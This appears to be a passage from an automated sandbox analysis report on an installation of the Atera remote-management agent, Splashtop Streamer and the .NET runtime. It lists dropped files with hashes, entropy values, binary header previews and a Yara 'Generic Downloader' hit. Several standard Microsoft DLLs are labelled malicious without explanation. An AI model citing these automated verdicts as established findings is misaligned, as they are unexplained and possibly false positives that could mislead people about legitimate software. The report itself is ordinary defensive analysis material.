                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j=.I.S.I.S.I.S..~..H.S..~Q.H.S.RichI.S.PE..d...8..f.........." .........................................................@......f.....`.......................................................... ..`................(..............T............................................................................rdata..X...........................@..@.rsrc...`.... ......................@..@....8..f........j...l...l.......8..f........................8..f........l...................................RSDS.v...lbG..}.c.......D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscorrc\mscorrc.pdb...............................T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... .......rsrc$01.....;.......rsrc$02....................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\msquic.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):517032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.327188439808119
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:DD4t2kjj3Ueh/9WoJcDSdiA9HuUrUb9KcvYCxe3Rw42SISaVGxQJyRMq1KsLGjrT:DDrkjjUoJcDSdiw4QcO3RoS9MV
                                                                                                                                                                                                                                                                                                                                  MD5:B5D0F85E7C820DB76EF2F4535552F03C
                                                                                                                                                                                                                                                                                                                                  SHA1:91EFF42F542175A41549BC966E9B249B65743951
                                                                                                                                                                                                                                                                                                                                  SHA-256:3D6D6E7A6F4729A7A416165BEABDA8A281AFFF082EBB538DF29E8F03E1A4741C
                                                                                                                                                                                                                                                                                                                                  SHA-512:5246EBEAF84A0486FF5ADB2083F60465FC68393D50AF05D17F704D08229CE948860018CBE880C40D5700154C3E61FC735C451044F85E03D78568D60DE80752F7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.................................................................................7...2......2......2.7....._....2......Rich............................PE..d.....Mb.........." .................E.......................................0.......H....`A........................................0y..|....y....... ..h........>.......'... ..........T...............................8............... ............................text...z........................... ..`.rdata...{.......|..................@..@.data...p2...........r..............@....pdata...>.......@...~..............@..@_RDATA..............................@..@.rsrc...h.... ......................@..@.reloc....... ......................@..B........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):101640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.506576792775679
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:XiTrnaN0HjO8MZYq5V4bgDHsPdPpwSJ5L3Akcg9Qjei+azJ:maN8qZYe4bgDUnNKjeu1
                                                                                                                                                                                                                                                                                                                                  MD5:24DE069D45146E3C9C58241640EBC228
                                                                                                                                                                                                                                                                                                                                  SHA1:7ADA4AFFD7F72B83888B9A2E6B6A3CA9F6A8498A
                                                                                                                                                                                                                                                                                                                                  SHA-256:3B9D2E148DA3B035B12DC0787F8C5B23EC502B2428F6593A1B5C65BF527A3D5C
                                                                                                                                                                                                                                                                                                                                  SHA-512:6136C2954C59BBC0B26CD8E99AA3A2523A62F9AC90F415F3E74206D638762BF5E46E8B9DD72FD30F50CFC1997F2F8BD9D09BA160ADE9B6D008BADA6B46CEFE3E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xr..........." ..0..Z..........6x... ........... ..............................p.....`..................................w..O.......8............d...)...........w..T............................................ ............... ..H............text...<X... ...Z.................. ..`.rsrc...8............\..............@..@.reloc...............b..............@..B.................x......H.......P ..DV...................v......................................BSJB............v4.0.30319......l.......#~..,.......#Strings.....R......#US..R......#GUID....R..P...#Blob............T.........3................................U...(......H.........5*....;*....'8.........., A...7.J..P4*U..5#*U...:*U..n7*U..&1*U....*U.../*U..(7*U...(*U...T-..../-...i&....7*................./...../...../...)./...1./...9./...A./...I./...Q./...Y./...a./...i./...q./...y./...../. .../...../...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\ucrtbase.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1122768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6466118295886165
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:CJG2BrB3ZQAq0AT2jS9HKHdK6AccMs1wmxvSZX0ypFi:0VGrT6SAk3ei
                                                                                                                                                                                                                                                                                                                                  MD5:3B337C2D41069B0A1E43E30F891C3813
                                                                                                                                                                                                                                                                                                                                  SHA1:EBEE2827B5CB153CBBB51C9718DA1549FA80FC5C
                                                                                                                                                                                                                                                                                                                                  SHA-256:C04DAEBA7E7C4B711D33993AB4C51A2E087F98F4211AEA0DCB3A216656BA0AB7
                                                                                                                                                                                                                                                                                                                                  SHA-512:FDB3012A71221447B35757ED2BDCA6ED1F8833B2F81D03AABEBD2CD7780A33A9C3D816535D03C5C3EDD5AAF11D91156842B380E2A63135E3C7F87193AD211499
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:K..:K..:K..K..:K..;K..:KK..K..:KK.:J..:KK.9J..:KK.?J..:KK.>J.:KK.4J..:KK..K..:KK.8J..:KRich..:K........PE..d................" .....0..........0^...............................................N....`A................................................................. ...........!...... .......p............................Z..8..............(............................text...X .......0.................. ..`.rdata......@.......@..............@..@.data....&....... ..................@....pdata....... ......................@..@.rsrc...............................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote\Splashtop Streamer.lnk

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Sep 13 19:26:18 2024, mtime=Wed Oct 30 21:31:04 2024, atime=Fri Sep 13 19:26:18 2024, length=4641288, window=hide
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2267
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.541071343610311
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:8os+EJdOEvbw2K3qnA5ffdQ4dGdQcQTUUsuyfm:8DxJdOG1U7JfdtdGdlx/
                                                                                                                                                                                                                                                                                                                                  MD5:A63ED920ECCFD76967B690A32C48C4F9
                                                                                                                                                                                                                                                                                                                                  SHA1:DFFBE98063E1E60DE4967991AB5A5CDCFED2922E
                                                                                                                                                                                                                                                                                                                                  SHA-256:3D3581DC0F8A572F94436D92F89FF6B6018CDD25717650829C1D3A703E04E843
                                                                                                                                                                                                                                                                                                                                  SHA-512:CBD7195229E34FC52074ACECD3C55D30AE73166FDFF9994430B10AB900C5AE5D1B73C4A458D092BAAEB4540949E0EF0898F71700AAAC05FDCAAAE8C1C08FDFCD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. .....10......g.+....10......F.....................G....P.O. .:i.....+00.../C:\.....................1.....^Y...PROGRA~2.........O.I^Y.....................V.....<=..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....^Y...SPLASH~1..D......^Y.^Y...........................<=..S.p.l.a.s.h.t.o.p.....j.1.....^Y...SPLASH~1..R......^Y.^Y...........................<=..S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e.....T.1.....^Y...Server..>......^Y.^Y.............................R.S.e.r.v.e.r.....f.2...F.-YI. .SRServer.exe..J......-YI.^Y.....'.........................S.R.S.e.r.v.e.r...e.x.e.......t...............-.......s............8.n.....C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe..T.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.S.p.l.a.s.h.t.o.p.\.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e.\.S.e.r.v.e.r.\.S.R.S.e.r.v.e.r...e.x.e.8.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.S.p.l

                                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AteraAgent.exe.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2402
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                                                                                                                  MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                                                                                                                  SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                                                                                                                  SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                                                                                                                  SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a

                                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):651
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                                                                                  MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                                                                                  SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                                                                                  SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c50a.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2994176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.878685496531656
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                                                                  MD5:2BA70A300E16D1B51BD103DE907777D8
                                                                                                                                                                                                                                                                                                                                  SHA1:9774343AEB3B6F06593FC84A59422EF3B8CCE66B
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D47740BF97710835EBE91AC545FF0DA45D81B54DFB8E2DEA485FE5A123AE468
                                                                                                                                                                                                                                                                                                                                  SHA-512:A2BA8694EA4D014E4103ED02D11BA7309D0CE0F290F55F0D671710CDF61F6D06D976531469686325965966A2D9CD5A0B3A69F47CA5B351B40DA03FFAF15D47BB
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c50c.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2994176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.878685496531656
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                                                                  MD5:2BA70A300E16D1B51BD103DE907777D8
                                                                                                                                                                                                                                                                                                                                  SHA1:9774343AEB3B6F06593FC84A59422EF3B8CCE66B
                                                                                                                                                                                                                                                                                                                                  SHA-256:0D47740BF97710835EBE91AC545FF0DA45D81B54DFB8E2DEA485FE5A123AE468
                                                                                                                                                                                                                                                                                                                                  SHA-512:A2BA8694EA4D014E4103ED02D11BA7309D0CE0F290F55F0D671710CDF61F6D06D976531469686325965966A2D9CD5A0B3A69F47CA5B351B40DA03FFAF15D47BB
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c50d.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 936, Title: Installation Database, Subject: Splashtop Streamer, Author: Splashtop Inc., Keywords: Installer,MSI,Database, Comments: Splashtop Streamer Installer, Create Time/Date: Fri Sep 13 17:31:18 2024, Name of Creating Application: InstallShield?2021 27, Security: 1, Template: Intel;0,1033,2052,1028,1036,1031,1040,1041,1042,1046,1049,1034, Last Saved By: Intel;2052, Revision Number: {B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{001F085C-058A-480B-AD56-2940B857C38D}, Number of Pages: 200, Number of Characters: 1
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53136896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.963270308775673
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:786432:kB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZ:VDO0GVUINbD5gwLz2mu2/3YZh3bZ
                                                                                                                                                                                                                                                                                                                                  MD5:ACF51C28B5EF5F78EE2A1F6800EDF813
                                                                                                                                                                                                                                                                                                                                  SHA1:CD52386AE838919C9D2813FF6179D7EC94B45B92
                                                                                                                                                                                                                                                                                                                                  SHA-256:82D4B1E2F38A8955F870232706CCE5193CD044F37C5414FED128F5DA846957B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C9200CEEC6F81A63DE63CD1038BC3B18D98B83B8DC738A2D02A7FF295F79312A57A60D4EFE904ACC2696C4E157D722C09ECF943AF0C1257EAFA6B8D9C3655852
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...................+...............8........6........................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-......./.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;...................H............................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...B...M...:...<.......=...........@...A...:...C...D...E...F...G...H...I...J...N...L...........O...P...Q...R...S...T...U...Z...W...X...Y...0...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c510.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 936, Title: Installation Database, Subject: Splashtop Streamer, Author: Splashtop Inc., Keywords: Installer,MSI,Database, Comments: Splashtop Streamer Installer, Create Time/Date: Fri Sep 13 17:31:18 2024, Name of Creating Application: InstallShield?2021 27, Security: 1, Template: Intel;0,1033,2052,1028,1036,1031,1040,1041,1042,1046,1049,1034, Last Saved By: Intel;2052, Revision Number: {B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{B7C5EA94-B96A-41F5-BE95-25D78B486678}3.7.2.0;{001F085C-058A-480B-AD56-2940B857C38D}, Number of Pages: 200, Number of Characters: 1
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53136896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.963270308775673
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:786432:kB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZ:VDO0GVUINbD5gwLz2mu2/3YZh3bZ
                                                                                                                                                                                                                                                                                                                                  MD5:ACF51C28B5EF5F78EE2A1F6800EDF813
                                                                                                                                                                                                                                                                                                                                  SHA1:CD52386AE838919C9D2813FF6179D7EC94B45B92
                                                                                                                                                                                                                                                                                                                                  SHA-256:82D4B1E2F38A8955F870232706CCE5193CD044F37C5414FED128F5DA846957B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:C9200CEEC6F81A63DE63CD1038BC3B18D98B83B8DC738A2D02A7FF295F79312A57A60D4EFE904ACC2696C4E157D722C09ECF943AF0C1257EAFA6B8D9C3655852
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...................+...............8........6........................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-......./.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;...................H............................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...B...M...:...<.......=...........@...A...:...C...D...E...F...G...H...I...J...N...L...........O...P...Q...R...S...T...U...Z...W...X...Y...0...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c512.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Runtime - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Runtime - 6.0.35 (x64)., Template: x64;1033, Revision Number: {76657AF8-AF4E-4FA9-9A39-80AC267D9B11}, Create Time/Date: Fri Sep 20 22:46:46 2024, Last Saved Time/Date: Fri Sep 20 22:46:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27254784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.993818546625114
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:393216:S9tkUbkbvqusHBmlh8dvMt0NDf8K/36n8lxjNnLBKopkJUjy/AlhxH169Dqnw+Oz:24qu1lMDf8Kyn83jNltkJ7JGnTOaTm
                                                                                                                                                                                                                                                                                                                                  MD5:D9F7AE6A57AF83B652711426C4834045
                                                                                                                                                                                                                                                                                                                                  SHA1:98D255AECDBFD1BAE9FF533D4C7E5DBE5D0E1833
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF1319821632F2CEB79C61B4CA6EB53A6341FBA295C02716418216857AF7F4E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C7DB8C0617125DEB27DE37B056FEEAEAF18585A12AD347A6E6C132AE438E1EB0F27180BC700BD8322E5D5A30E7CEFA62B123E7B0B9CD85E1B8605C0B195BE03
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c515.msi

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft .NET Runtime - 6.0.35 (x64), Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft .NET Runtime - 6.0.35 (x64)., Template: x64;1033, Revision Number: {76657AF8-AF4E-4FA9-9A39-80AC267D9B11}, Create Time/Date: Fri Sep 20 22:46:46 2024, Last Saved Time/Date: Fri Sep 20 22:46:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27254784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.993818546625114
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:393216:S9tkUbkbvqusHBmlh8dvMt0NDf8K/36n8lxjNnLBKopkJUjy/AlhxH169Dqnw+Oz:24qu1lMDf8Kyn83jNltkJ7JGnTOaTm
                                                                                                                                                                                                                                                                                                                                  MD5:D9F7AE6A57AF83B652711426C4834045
                                                                                                                                                                                                                                                                                                                                  SHA1:98D255AECDBFD1BAE9FF533D4C7E5DBE5D0E1833
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF1319821632F2CEB79C61B4CA6EB53A6341FBA295C02716418216857AF7F4E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C7DB8C0617125DEB27DE37B056FEEAEAF18585A12AD347A6E6C132AE438E1EB0F27180BC700BD8322E5D5A30E7CEFA62B123E7B0B9CD85E1B8605C0B195BE03
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Installer\44c516.msi

                                                                                                                                                                                                                                                                                                                                  Download File
